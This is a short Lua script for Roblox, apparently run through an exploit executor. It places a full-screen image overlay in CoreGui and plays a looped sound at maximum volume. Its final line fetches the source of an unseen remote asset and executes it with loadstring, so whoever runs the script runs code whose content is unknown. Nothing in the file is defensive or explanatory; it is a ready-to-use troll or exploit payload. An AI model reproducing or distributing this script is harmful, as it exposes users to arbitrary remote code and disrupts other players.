local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local ImageLabel = Instance.new("ImageLabel")

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame.Position = UDim2.new(0.00925212074, 0, 0.0159509201, 0)
Frame.Size = UDim2.new(0, 1272, 0, 795)

ImageLabel.Parent = ScreenGui
ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel.Size = UDim2.new(0, 1980, 0, 1000)
ImageLabel.Image = "http://www.roblox.com/asset/?id=4537616739"
--
        local sound = Instance.new("Sound", game.CoreGui)
        sound.SoundId = "rbxassetid://4922664048"
        sound:Play()
        sound.Volume = 10
        sound.Looped = 1
--
loadstring(game:GetObjects("rbxassetid://4698064966")[1].Source)()
